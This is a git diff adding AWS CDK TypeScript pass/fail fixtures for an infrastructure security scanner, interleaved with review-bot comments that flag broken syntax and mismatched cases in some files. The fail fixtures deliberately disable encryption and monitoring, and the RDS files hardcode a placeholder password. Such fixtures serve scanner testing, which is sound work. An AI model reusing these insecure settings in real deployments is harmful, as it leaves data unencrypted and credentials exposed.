index 00000000000..5b8dc049840
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaEnvironmentEncryptionSettings/pass.ts
@@ -0,0 +1,31 @@
+import {aws_lambda as lambda} from 'aws-cdk-lib';
+import {aws_sam as sam} from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+});
+
+const cfnSecurityConfiguration3 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+});
+
+const cfnSecurityConfigurationProps1: lambda.FunctionProps = {
+ name: 'name',
+ role: "",
+};
+
+const cfnSecurityConfigurationProps2: lambda.CfnFunctionProps = {
+ name: 'name',
+ role: "",
+};
+
+const cfnSecurityConfigurationProps3: sam.CfnFunctionProps = {
+ name: 'name',
+};
diff --git a/cdk_integration_tests/src/typescript/LambdaFunctionLevelConcurrentExecutionLimit/fail.ts b/cdk_integration_tests/src/typescript/LambdaFunctionLevelConcurrentExecutionLimit/fail.ts
new file mode 100644
index 00000000000..16236a09dab
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaFunctionLevelConcurrentExecutionLimit/fail.ts
@@ -0,0 +1,29 @@
+import {aws_lambda as lambda} from 'aws-cdk-lib';
+import {aws_sam as sam} from 'aws-cdk-lib';
+
+const cfnSecurityConfigurationProps1: lambda.FunctionProps = {
+ name: 'name',
+ role: "",
+ environment: {
+ "bla": "bla",
+ }
+};
+
+const cfnSecurityConfigurationProps2: lambda.CfnFunctionProps = {
+ name: 'name',
+ role: "",
+ environment: {
+ variables: {
+ "bla": "bla",
+ }
+ }
+};
+
+const cfnSecurityConfigurationProps3: sam.CfnFunctionProps = {
+ name: 'name',
+ environment: {
+ variables: {
+ bla: "bla",
+ }
+ }
+};
diff --git a/cdk_integration_tests/src/typescript/LambdaFunctionLevelConcurrentExecutionLimit/fail2.ts b/cdk_integration_tests/src/typescript/LambdaFunctionLevelConcurrentExecutionLimit/fail2.ts
new file mode 100644
index 00000000000..1e3b04d006f
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaFunctionLevelConcurrentExecutionLimit/fail2.ts
@@ -0,0 +1,30 @@
+import { aws_lambda as lambda } from 'aws-cdk-lib';
+import { aws_sam as sam } from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ "bla": "bla",
+ }
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ variables: {
+ "bla": "bla",
+ }
+ }
+});
+
+const cfnSecurityConfiguration3 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ variables: {
+ bla: "bla",
+ }
+ }
+});
diff --git a/cdk_integration_tests/src/typescript/LambdaFunctionLevelConcurrentExecutionLimit/pass.ts b/cdk_integration_tests/src/typescript/LambdaFunctionLevelConcurrentExecutionLimit/pass.ts
new file mode 100644
index 00000000000..8f3a13bb29c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaFunctionLevelConcurrentExecutionLimit/pass.ts
@@ -0,0 +1,69 @@
+import {aws_lambda as lambda} from 'aws-cdk-lib';
+import {aws_sam as sam} from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ "bla": "bla",
+ },
+ environmentEncryption: {},
+ "reservedConcurrentExecutions": 1,
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ variables: {
+ "bla": "bla",
+ }
+ },
+ kmsKeyArn: "arn",
+ reservedConcurrentExecutions: 1,
+});
+
+const cfnSecurityConfiguration3 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ variables: {
+ bla: "bla",
+ }
+ },
+ kmsKeyArn: "arn",
+ reservedConcurrentExecutions: 1,
+});
+
+const cfnSecurityConfigurationProps1: lambda.FunctionProps = {
+ name: 'name',
+ role: "",
+ environment: {
+ "bla": "bla",
+ },
+ environmentEncryption: {},
+ reservedConcurrentExecutions: 1,
+};
+
+const cfnSecurityConfigurationProps2: lambda.CfnFunctionProps = {
+ name: 'name',
+ role: "",
+ environment: {
+ variables: {
+ "bla": "bla",
+ }
+ },
+ kmsKeyArn: "arn",
+ reservedConcurrentExecutions: 1,
+};
+
+const cfnSecurityConfigurationProps3: sam.CfnFunctionProps = {
+ name: 'name',
+ environment: {
+ variables: {
+ bla: "bla",
+ }
+ },
+ kmsKeyArn: "arn",
+ reservedConcurrentExecutions: 1,
+};
diff --git a/cdk_integration_tests/src/typescript/LambdaInVPC/fail.ts b/cdk_integration_tests/src/typescript/LambdaInVPC/fail.ts
new file mode 100644
index 00000000000..16236a09dab
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaInVPC/fail.ts
@@ -0,0 +1,29 @@
+import {aws_lambda as lambda} from 'aws-cdk-lib';
+import {aws_sam as sam} from 'aws-cdk-lib';
+
+const cfnSecurityConfigurationProps1: lambda.FunctionProps = {
+ name: 'name',
+ role: "",
+ environment: {
+ "bla": "bla",
+ }
+};
+
+const cfnSecurityConfigurationProps2: lambda.CfnFunctionProps = {
+ name: 'name',
+ role: "",
+ environment: {
+ variables: {
+ "bla": "bla",
+ }
+ }
+};
+
+const cfnSecurityConfigurationProps3: sam.CfnFunctionProps = {
+ name: 'name',
+ environment: {
+ variables: {
+ bla: "bla",
+ }
+ }
+};
diff --git a/cdk_integration_tests/src/typescript/LambdaInVPC/fail2.ts b/cdk_integration_tests/src/typescript/LambdaInVPC/fail2.ts
new file mode 100644
index 00000000000..63deab6d904
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaInVPC/fail2.ts
@@ -0,0 +1,27 @@
+import { aws_lambda as lambda } from 'aws-cdk-lib';
+import { aws_sam as sam } from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ variables: {
+ "bla": "bla",
+ }
+ }
+});
+
+const cfnSecurityConfiguration3 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ variables: {
+ bla: "bla",
+ }
+ }
+});
diff --git a/cdk_integration_tests/src/typescript/LambdaInVPC/pass.ts b/cdk_integration_tests/src/typescript/LambdaInVPC/pass.ts
new file mode 100644
index 00000000000..4fc24e72e40
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LambdaInVPC/pass.ts
@@ -0,0 +1,69 @@
+import {aws_lambda as lambda} from 'aws-cdk-lib';
+import {aws_sam as sam} from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new lambda.Function(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ "bla": "bla",
+ },
+ environmentEncryption: {},
+ "vpc": {},
+});
+
+const cfnSecurityConfiguration2 = new lambda.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ variables: {
+ "bla": "bla",
+ }
+ },
+ kmsKeyArn: "arn",
+ vpcConfig: {},
+});
+
+const cfnSecurityConfiguration3 = new sam.CfnFunction(this, 'MyCfnSecurityConfiguration', {
+ role: "",
+ name: 'name',
+ environment: {
+ variables: {
+ bla: "bla",
+ }
+ },
+ kmsKeyArn: "arn",
+ vpcConfig: {},
+});
+
+const cfnSecurityConfigurationProps1: lambda.FunctionProps = {
+ name: 'name',
+ role: "",
+ environment: {
+ "bla": "bla",
+ },
+ environmentEncryption: {},
+ reservedConcurrentExecutions: 1,
+};
+
+const cfnSecurityConfigurationProps2: lambda.CfnFunctionProps = {
+ name: 'name',
+ role: "",
+ environment: {
+ variables: {
+ "bla": "bla",
+ }
+ },
+ kmsKeyArn: "arn",
+ reservedConcurrentExecutions: 1,
+};
+
+const cfnSecurityConfigurationProps3: sam.CfnFunctionProps = {
+ name: 'name',
+ environment: {
+ variables: {
+ bla: "bla",
+ }
+ },
+ kmsKeyArn: "arn",
+ reservedConcurrentExecutions: 1,
+};
diff --git a/cdk_integration_tests/src/typescript/LaunchConfigurationEBSEncryption/fail.ts b/cdk_integration_tests/src/typescript/LaunchConfigurationEBSEncryption/fail.ts
new file mode 100644
index 00000000000..1d3aa5f5bf0
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LaunchConfigurationEBSEncryption/fail.ts
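Review bot: the three `*Props` literals at the end of LambdaInVPC/pass.ts carry `reservedConcurrentExecutions: 1` but no `vpc`/`vpcConfig`, which looks copied from the concurrent-execution-limit pass fixture; since fail.ts for this check uses the same Props form to produce findings, these would presumably be reported as failures here unless the check ignores Props objects. Replace the concurrency setting with VPC settings to match the constructor variants above, e.g. `vpc: {}` on the `lambda.FunctionProps` literal and `vpcConfig: {}` on the two `CfnFunctionProps` literals.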
@@ -0,0 +1,44 @@
+import {aws_autoscaling as autoscaling} from 'aws-cdk-lib';
+
+const cfnSecurityConfigurationProps1: autoscaling.CfnLaunchConfigurationProps = {
+ imageId: 'imageId',
+ instanceType: 'instanceType',
+
+ // the properties below are optional
+ associatePublicIpAddress: false,
+ blockDeviceMappings: [{
+ deviceName: 'deviceName',
+
+ // the properties below are optional
+ ebs: {
+ deleteOnTermination: false,
+ encrypted: false,
+ iops: 123,
+ snapshotId: 'snapshotId',
+ throughput: 123,
+ volumeSize: 123,
+ volumeType: 'volumeType',
+ },
+ noDevice: false,
+ virtualName: 'virtualName',
+ }],
+ classicLinkVpcId: 'classicLinkVpcId',
+ classicLinkVpcSecurityGroups: ['classicLinkVpcSecurityGroups'],
+ ebsOptimized: false,
+ iamInstanceProfile: 'iamInstanceProfile',
+ instanceId: 'instanceId',
+ instanceMonitoring: false,
+ kernelId: 'kernelId',
+ keyName: 'keyName',
+ launchConfigurationName: 'launchConfigurationName',
+ metadataOptions: {
+ httpEndpoint: 'httpEndpoint',
+ httpPutResponseHopLimit: 123,
+ httpTokens: 'httpTokens',
+ },
+ placementTenancy: 'placementTenancy',
+ ramDiskId: 'ramDiskId',
+ securityGroups: ['securityGroups'],
+ spotPrice: 'spotPrice',
+ userData: 'userData',
+};
diff --git a/cdk_integration_tests/src/typescript/LaunchConfigurationEBSEncryption/fail2.ts b/cdk_integration_tests/src/typescript/LaunchConfigurationEBSEncryption/fail2.ts
new file mode 100644
index 00000000000..1e181aa899f
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LaunchConfigurationEBSEncryption/fail2.ts
@@ -0,0 +1,30 @@
+import {aws_autoscaling as autoscaling} from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new autoscaling.CfnLaunchConfiguration(this, 'MyCfnSecurityConfiguration', {
+ imageId: 'imageId',
+ instanceType: 'instanceType',
+ blockDeviceMappings: [{
+ deviceName: 'deviceName',
+
+ // the properties below are optional
+ ebs: {
+ deleteOnTermination: false,
+ encrypted: false,
+ iops: 123,
+ snapshotId: 'snapshotId',
+ throughput: 123,
+ volumeSize: 123,
+ volumeType: 'volumeType',
+ },
+ noDevice: false,
+ virtualName: 'virtualName',
+ }],
+});
+
+const cfnSecurityConfiguration2 = new autoscaling.CfnLaunchConfiguration(this, 'MyCfnSecurityConfiguration', {
+ blockDeviceMappings: [{
+ ebs: {
+ encrypted: false,
+ },
+ }],
+});
diff --git a/cdk_integration_tests/src/typescript/LaunchConfigurationEBSEncryption/pass.ts b/cdk_integration_tests/src/typescript/LaunchConfigurationEBSEncryption/pass.ts
new file mode 100644
index 00000000000..112dd95dce5
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/LaunchConfigurationEBSEncryption/pass.ts
@@ -0,0 +1,155 @@
+import { aws_autoscaling as autoscaling } from 'aws-cdk-lib';
+
+const cfnSecurityConfiguration1 = new autoscaling.CfnLaunchConfiguration(this, 'MyCfnSecurityConfiguration', {
+ imageId: 'imageId',
+ instanceType: 'instanceType',
+ blockDeviceMappings: [{
+ deviceName: 'deviceName',
+
+ // the properties below are optional
+ ebs: {
+ deleteOnTermination: false,
+ encrypted: true,
+ iops: 123,
+ snapshotId: 'snapshotId',
+ throughput: 123,
+ volumeSize: 123,
+ volumeType: 'volumeType',
+ },
+ noDevice: false,
+ virtualName: 'virtualName',
+ }],
+});
+
+const cfnSecurityConfiguration2 = new autoscaling.CfnLaunchConfiguration(this, 'MyCfnSecurityConfiguration', {
+ imageId: 'imageId',
+ instanceType: 'instanceType',
+ blockDeviceMappings: [{
+ deviceName: 'deviceName',
+
+ // the properties below are optional
+ ebs: {
+ deleteOnTermination: false,
+ iops: 123,
+ snapshotId: 'snapshotId',
+ throughput: 123,
+ volumeSize: 123,
+ volumeType: 'volumeType',
+ },
+ noDevice: false,
+ virtualName: 'virtualName',
+ }],
+});
+
+const cfnSecurityConfiguration3 = new autoscaling.CfnLaunchConfiguration(this, 'MyCfnSecurityConfiguration', {
+ imageId: 'imageId',
+ instanceType: 'instanceType',
+ blockDeviceMappings: [{
+ deviceName: 'deviceName',
+ noDevice: false,
+ virtualName: 'virtualName',
+ }],
+});
+
+const cfnSecurityConfigurationProps1: autoscaling.CfnLaunchConfigurationProps = {
+ imageId: 'imageId',
+ instanceType: 'instanceType',
+
+ // the properties below are optional
+ associatePublicIpAddress: false,
+ blockDeviceMappings: [{
+ deviceName: 'deviceName',
+
+ // the properties below are optional
+ ebs: {
+ deleteOnTermination: false,
+ encrypted: true,
+ iops: 123,
+ snapshotId: 'snapshotId',
+ throughput: 123,
+ volumeSize: 123,
+ volumeType: 'volumeType',
+ },
+ noDevice: false,
+ virtualName: 'virtualName',
+ }],
+ classicLinkVpcId: 'classicLinkVpcId',
+ classicLinkVpcSecurityGroups: ['classicLinkVpcSecurityGroups'],
+ ebsOptimized: false,
+ iamInstanceProfile: 'iamInstanceProfile',
+ instanceId: 'instanceId',
+ instanceMonitoring: false,
+ kernelId: 'kernelId',
+ keyName: 'keyName',
+ launchConfigurationName: 'launchConfigurationName',
+ metadataOptions: {
+ httpEndpoint: 'httpEndpoint',
+ httpPutResponseHopLimit: 123,
+ httpTokens: 'httpTokens',
+ },
+ placementTenancy: 'placementTenancy',
+ ramDiskId: 'ramDiskId',
+ securityGroups: ['securityGroups'],
+ spotPrice: 'spotPrice',
+ userData: 'userData',
+};
+
+const cfnSecurityConfigurationProps2: autoscaling.CfnLaunchConfigurationProps = {
+ imageId: 'imageId',
+ instanceType: 'instanceType',
+
+ // the properties below are optional
+ associatePublicIpAddress: false,
+ blockDeviceMappings: [{
+ deviceName: 'deviceName',
+ noDevice: false,
+ virtualName: 'virtualName',
+ }],
+ classicLinkVpcId: 'classicLinkVpcId',
+ classicLinkVpcSecurityGroups: ['classicLinkVpcSecurityGroups'],
+ ebsOptimized: false,
+ iamInstanceProfile: 'iamInstanceProfile',
+ instanceId: 'instanceId',
+ instanceMonitoring: false,
+ kernelId: 'kernelId',
+ keyName: 'keyName',
+ launchConfigurationName: 'launchConfigurationName',
+ metadataOptions: {
+ httpEndpoint: 'httpEndpoint',
+ httpPutResponseHopLimit: 123,
+ httpTokens: 'httpTokens',
+ },
+ placementTenancy: 'placementTenancy',
+ ramDiskId: 'ramDiskId',
+ securityGroups: ['securityGroups'],
+ spotPrice: 'spotPrice',
+ userData: 'userData',
+};
+
+const cfnSecurityConfigurationProps3: autoscaling.CfnLaunchConfigurationProps = {
+ imageId: 'imageId',
+ instanceType: 'instanceType',
+
+ // the properties below are optional
+ associatePublicIpAddress: false,
+ classicLinkVpcId: 'classicLinkVpcId',
+ classicLinkVpcSecurityGroups: ['classicLinkVpcSecurityGroups'],
+ ebsOptimized: false,
+ iamInstanceProfile: 'iamInstanceProfile',
+ instanceId: 'instanceId',
+ instanceMonitoring: false,
+ kernelId: 'kernelId',
+ keyName: 'keyName',
+ launchConfigurationName: 'launchConfigurationName',
+ metadataOptions: {
+ httpEndpoint: 'httpEndpoint',
+ httpPutResponseHopLimit: 123,
+ httpTokens: 'httpTokens',
+ },
+ placementTenancy: 'placementTenancy',
+ ramDiskId: 'ramDiskId',
+ securityGroups: ['securityGroups'],
+ spotPrice: 'spotPrice',
+ userData: 'userData',
+};
+
diff --git a/cdk_integration_tests/src/typescript/NeptuneClusterStorageEncrypted/fail.ts b/cdk_integration_tests/src/typescript/NeptuneClusterStorageEncrypted/fail.ts
new file mode 100644
index 00000000000..b84b3a028dd
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/NeptuneClusterStorageEncrypted/fail.ts
@@ -0,0 +1,44 @@
+import { aws_neptune as neptune } from 'aws-cdk-lib';
+
+const cfnDBCluster1: neptune.CfnDBClusterProps = {
+ associatedRoles: [{
+ roleArn: 'roleArn',
+
+ // the properties below are optional
+ featureName: 'featureName',
+ }],
+ availabilityZones: ['availabilityZones'],
+ backupRetentionPeriod: 123,
+ copyTagsToSnapshot: false,
+ dbClusterIdentifier: 'dbClusterIdentifier',
+ dbClusterParameterGroupName: 'dbClusterParameterGroupName',
+ dbInstanceParameterGroupName: 'dbInstanceParameterGroupName',
+ dbPort: 123,
+ dbSubnetGroupName: 'dbSubnetGroupName',
+ deletionProtection: false,
+ enableCloudwatchLogsExports: ['enableCloudwatchLogsExports'],
+ engineVersion: 'engineVersion',
+ iamAuthEnabled: false,
+ kmsKeyId: 'kmsKeyId',
+ preferredBackupWindow: 'preferredBackupWindow',
+ preferredMaintenanceWindow: 'preferredMaintenanceWindow',
+ restoreToTime: 'restoreToTime',
+ restoreType: 'restoreType',
+ serverlessScalingConfiguration: {
+ maxCapacity: 123,
+ minCapacity: 123,
+ },
+ snapshotIdentifier: 'snapshotIdentifier',
+ sourceDbClusterIdentifier: 'sourceDbClusterIdentifier',
+ storageEncrypted: false,
+ tags: [{
+ key: 'key',
+ value: 'value',
+ }],
+ useLatestRestorableTime: false,
+ vpcSecurityGroupIds: ['vpcSecurityGroupIds'],
+});
+
+const cfnDBCluster2: neptune.CfnDBClusterProps = {
+ storageEncrypted: false,
+};
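Review bot: `cfnSecurityConfiguration2` in LaunchConfigurationEBSEncryption/pass.ts declares an `ebs` block with no `encrypted` key and is expected to pass, which treats an absent `Encrypted` as encrypted. For `AWS::AutoScaling::LaunchConfiguration` the EBS `Encrypted` property defaults to false unless account-level default EBS encryption is enabled, so a policy that passes on omission is lenient; whether that is the check's intended behaviour cannot be told from the fixture. If the leniency is deliberate, mark it with a comment such as `// ebs block without 'encrypted' is expected to pass (relies on account default encryption)`, otherwise move this resource to fail.ts.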
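Review bot: `cfnDBCluster1` in NeptuneClusterStorageEncrypted/fail.ts is a `neptune.CfnDBClusterProps` object literal but is closed with `});` instead of `};`, so the file is not valid TypeScript; the stray `)` presumably survived a copy from the constructor form in fail2.ts. The same closer appears on `cfnDBCluster4` in pass.ts (the next file). A fixture that does not parse may be skipped or only partially parsed by the scanner, in which case the expected fail/pass result is reached for the wrong reason; change both lines to `};`.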
diff --git a/cdk_integration_tests/src/typescript/NeptuneClusterStorageEncrypted/fail2.ts b/cdk_integration_tests/src/typescript/NeptuneClusterStorageEncrypted/fail2.ts
new file mode 100644
index 00000000000..861932fa4bc
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/NeptuneClusterStorageEncrypted/fail2.ts
@@ -0,0 +1,44 @@
+import { aws_neptune as neptune } from 'aws-cdk-lib';
+
+const cfnDBCluster1 = new neptune.CfnDBCluster(this, 'MyCfnDBCluster', /* all optional props */ {
+ associatedRoles: [{
+ roleArn: 'roleArn',
+
+ // the properties below are optional
+ featureName: 'featureName',
+ }],
+ availabilityZones: ['availabilityZones'],
+ backupRetentionPeriod: 123,
+ copyTagsToSnapshot: false,
+ dbClusterIdentifier: 'dbClusterIdentifier',
+ dbClusterParameterGroupName: 'dbClusterParameterGroupName',
+ dbInstanceParameterGroupName: 'dbInstanceParameterGroupName',
+ dbPort: 123,
+ dbSubnetGroupName: 'dbSubnetGroupName',
+ deletionProtection: false,
+ enableCloudwatchLogsExports: ['enableCloudwatchLogsExports'],
+ engineVersion: 'engineVersion',
+ iamAuthEnabled: false,
+ kmsKeyId: 'kmsKeyId',
+ preferredBackupWindow: 'preferredBackupWindow',
+ preferredMaintenanceWindow: 'preferredMaintenanceWindow',
+ restoreToTime: 'restoreToTime',
+ restoreType: 'restoreType',
+ serverlessScalingConfiguration: {
+ maxCapacity: 123,
+ minCapacity: 123,
+ },
+ snapshotIdentifier: 'snapshotIdentifier',
+ sourceDbClusterIdentifier: 'sourceDbClusterIdentifier',
+ storageEncrypted: false,
+ tags: [{
+ key: 'key',
+ value: 'value',
+ }],
+ useLatestRestorableTime: false,
+ vpcSecurityGroupIds: ['vpcSecurityGroupIds'],
+});
+
+const cfnDBCluster2 = new neptune.CfnDBCluster(this, 'MyCfnDBCluster', /* all optional props */ {
+ storageEncrypted: false,
+});
\ No newline at end of file
diff --git a/cdk_integration_tests/src/typescript/NeptuneClusterStorageEncrypted/pass.ts b/cdk_integration_tests/src/typescript/NeptuneClusterStorageEncrypted/pass.ts
new file mode 100644
index 00000000000..c7bfa3cac36
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/NeptuneClusterStorageEncrypted/pass.ts
@@ -0,0 +1,87 @@
+import {aws_neptune as neptune} from 'aws-cdk-lib';
+
+const cfnDBCluster1 = new neptune.CfnDBCluster(this, 'MyCfnDBCluster', /* all optional props */ {
+ associatedRoles: [{
+ roleArn: 'roleArn',
+
+ // the properties below are optional
+ featureName: 'featureName',
+ }],
+ availabilityZones: ['availabilityZones'],
+ backupRetentionPeriod: 123,
+ copyTagsToSnapshot: false,
+ dbClusterIdentifier: 'dbClusterIdentifier',
+ dbClusterParameterGroupName: 'dbClusterParameterGroupName',
+ dbInstanceParameterGroupName: 'dbInstanceParameterGroupName',
+ dbPort: 123,
+ dbSubnetGroupName: 'dbSubnetGroupName',
+ deletionProtection: false,
+ enableCloudwatchLogsExports: ['enableCloudwatchLogsExports'],
+ engineVersion: 'engineVersion',
+ iamAuthEnabled: false,
+ kmsKeyId: 'kmsKeyId',
+ preferredBackupWindow: 'preferredBackupWindow',
+ preferredMaintenanceWindow: 'preferredMaintenanceWindow',
+ restoreToTime: 'restoreToTime',
+ restoreType: 'restoreType',
+ serverlessScalingConfiguration: {
+ maxCapacity: 123,
+ minCapacity: 123,
+ },
+ snapshotIdentifier: 'snapshotIdentifier',
+ sourceDbClusterIdentifier: 'sourceDbClusterIdentifier',
+ storageEncrypted: true,
+ tags: [{
+ key: 'key',
+ value: 'value',
+ }],
+ useLatestRestorableTime: false,
+ vpcSecurityGroupIds: ['vpcSecurityGroupIds'],
+});
+
+const cfnDBCluster2 = new neptune.CfnDBCluster(this, 'MyCfnDBCluster', /* all optional props */ {
+ storageEncrypted: true,
+});
+
+const cfnDBCluster4: neptune.CfnDBClusterProps = {
+ associatedRoles: [{
+ roleArn: 'roleArn',
+
+ // the properties below are optional
+ featureName: 'featureName',
+ }],
+ availabilityZones: ['availabilityZones'],
+ backupRetentionPeriod: 123,
+ copyTagsToSnapshot: false,
+ dbClusterIdentifier: 'dbClusterIdentifier',
+ dbClusterParameterGroupName: 'dbClusterParameterGroupName',
+ dbInstanceParameterGroupName: 'dbInstanceParameterGroupName',
+ dbPort: 123,
+ dbSubnetGroupName: 'dbSubnetGroupName',
+ deletionProtection: false,
+ enableCloudwatchLogsExports: ['enableCloudwatchLogsExports'],
+ engineVersion: 'engineVersion',
+ iamAuthEnabled: false,
+ kmsKeyId: 'kmsKeyId',
+ preferredBackupWindow: 'preferredBackupWindow',
+ preferredMaintenanceWindow: 'preferredMaintenanceWindow',
+ restoreToTime: 'restoreToTime',
+ restoreType: 'restoreType',
+ serverlessScalingConfiguration: {
+ maxCapacity: 123,
+ minCapacity: 123,
+ },
+ snapshotIdentifier: 'snapshotIdentifier',
+ sourceDbClusterIdentifier: 'sourceDbClusterIdentifier',
+ storageEncrypted: true,
+ tags: [{
+ key: 'key',
+ value: 'value',
+ }],
+ useLatestRestorableTime: false,
+ vpcSecurityGroupIds: ['vpcSecurityGroupIds'],
+});
+
+const cfnDBCluster5: neptune.CfnDBClusterProps = {
+ storageEncrypted: true,
+};
diff --git a/cdk_integration_tests/src/typescript/RDSEnhancedMonitorEnabled/fail2.ts b/cdk_integration_tests/src/typescript/RDSEnhancedMonitorEnabled/fail2.ts
new file mode 100644
index 00000000000..ea8cb01972b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RDSEnhancedMonitorEnabled/fail2.ts
@@ -0,0 +1,27 @@
+import {aws_rds as rds} from 'aws-cdk-lib';
+
+const instance2 = new rds.DatabaseInstance(this, "PostgresInstance2", {
+ engine: rds.DatabaseInstanceEngine.POSTGRES,
+ credentials: {
+ username: 'username',
+ password: 'password'
+ },
+ monitoringInterval: 0,
+});
+
+const instance1 = new rds.DatabaseInstance(this, "PostgresInstance2", {
+ engine: rds.DatabaseInstanceEngine.POSTGRES,
+ credentials: {
+ username: 'username',
+ password: 'password'
+ },
+ monitoringInterval: -1,
+});
+
+const instance3 = new rds.DatabaseInstance(this, "PostgresInstance2", {
+ engine: rds.DatabaseInstanceEngine.POSTGRES,
+ credentials: {
+ username: 'username',
+ password: 'password'
+ },
+});
diff --git a/cdk_integration_tests/src/typescript/RDSEnhancedMonitorEnabled/pass.ts b/cdk_integration_tests/src/typescript/RDSEnhancedMonitorEnabled/pass.ts
new file mode 100644
index 00000000000..5a5e8c0f1e5
--- /dev/null
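Review bot: every `DatabaseInstance` in RDSEnhancedMonitorEnabled/fail2.ts carries a literal `password: 'password'` inside `credentials`, which has nothing to do with the monitoring-interval condition and is exactly the pattern repository secret scanners flag; pass.ts (next file) repeats it. In aws-cdk-lib the `credentials` prop is normally built with `rds.Credentials.fromGeneratedSecret('username')` rather than a plain object, and as far as I recall `monitoringInterval` on the L2 `DatabaseInstance` is a `Duration`, not a number, so the fixture would not compile as written either. That is acceptable for a parser-level fixture, but dropping the `credentials` block (or switching to the generated-secret form) removes the false-positive bait without changing what the check sees.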
+++ b/cdk_integration_tests/src/typescript/RDSEnhancedMonitorEnabled/pass.ts
@@ -0,0 +1,20 @@
+import {aws_rds as rds} from 'aws-cdk-lib';
+
+const instance2 = new rds.DatabaseInstance(this, "PostgresInstance2", {
+ engine: rds.DatabaseInstanceEngine.POSTGRES,
+ credentials: {
+ username: 'username',
+ password: 'password'
+ },
+ monitoringInterval: 1,
+});
+
+const instance1 = new rds.DatabaseInstance(this, "PostgresInstance2", {
+ engine: rds.DatabaseInstanceEngine.POSTGRES,
+ credentials: {
+ username: 'username',
+ password: 'password'
+ },
+ monitoringInterval: 322424,
+});
+
diff --git a/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/fail.ts b/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/fail.ts
new file mode 100644
index 00000000000..0a4c784e132
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/fail.ts
@@ -0,0 +1,10 @@
+// SOURCE
+import { DatabaseInstance } from '@aws-cdk/aws-rds';
+
+// SINK
+// SINK: Vulnerability found due to missing Multi-AZ setting
+new DatabaseInstance(stack, 'MyDatabaseInstance', {
+ instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.MICRO),
+ vpc
+ // missing Multi-AZ setting
+});
diff --git a/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/pass.ts b/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/pass.ts
new file mode 100644
index 00000000000..77af0d727c9
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RDSMultiAZEnabled/pass.ts
@@ -0,0 +1,10 @@
+// SOURCE
+import { DatabaseInstance } from '@aws-cdk/aws-rds';
+
+// SINK
+// SINK: Vulnerability found due to missing Multi-AZ setting
+new DatabaseInstance(stack, 'MyDatabaseInstance', {
+ instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.MICRO),
+ vpc,
+ multiAZ: true
+});
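Review bot: RDSMultiAZEnabled/pass.ts keeps the comment `// SINK: Vulnerability found due to missing Multi-AZ setting` above a resource that sets `multiAZ: true`, so the comment contradicts the expected result of the file; drop it or change it to `// SINK: Multi-AZ enabled, no finding expected`. `stack`, `ec2` and `vpc` are also used without being declared or imported in both RDSMultiAZEnabled fixtures, which only works because the scanner does not resolve identifiers.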
diff --git a/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/fail.ts b/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/fail.ts
new file mode 100644
index 00000000000..d125920e0f8
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/fail.ts
@@ -0,0 +1,10 @@
+// SOURCE
+import { DatabaseInstance } from '@aws-cdk/aws-rds';
+
+// SINK
+// SINK: Vulnerability found due to publicly accessible setting
+new DatabaseInstance(stack, 'MyDatabaseInstance', {
+ instanceType: ec2.InstanceType.of(ec2.InstanceClass.BURSTABLE2, ec2.InstanceSize.MICRO),
+ vpc
+ // publicly accessible setting missing
+});
diff --git a/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/pass.ts b/cdk_integration_tests/src/typescript/RDSPubliclyAccessible/pass.ts
new file mode 100644
index 00000000000..07d46be962d
